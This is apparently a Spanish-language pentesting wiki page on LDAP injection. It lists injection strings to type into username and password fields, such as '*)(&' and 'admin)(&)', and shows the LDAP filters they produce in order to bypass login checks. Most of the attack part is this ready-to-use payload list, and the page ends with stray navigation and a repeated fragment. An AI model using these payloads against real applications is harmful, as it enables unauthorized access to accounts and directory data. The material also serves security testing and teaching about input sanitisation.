Ldap Injection

La inyección LDAP es un ataque que se utiliza para explotar aplicaciones basadas en web que construyen declaraciones LDAP basadas en la entrada del usuario. Cuando una aplicación no puede desinfectar adecuadamente la entrada del usuario, es posible modificar las declaraciones LDAP usando un proxy local.

Prueba de añadir estos simbolos tanto en el campo username como password

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Ejemplo

user=*
password=*
---------------------------------
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
---------------------------------
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
---------------------------------
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error

Referencia

LDAP InjectionHackTricks

PreviousAuthentication Bypass NextHacking APIs

Last updated 1 year ago

Login bypass

Ejemplo

Referencia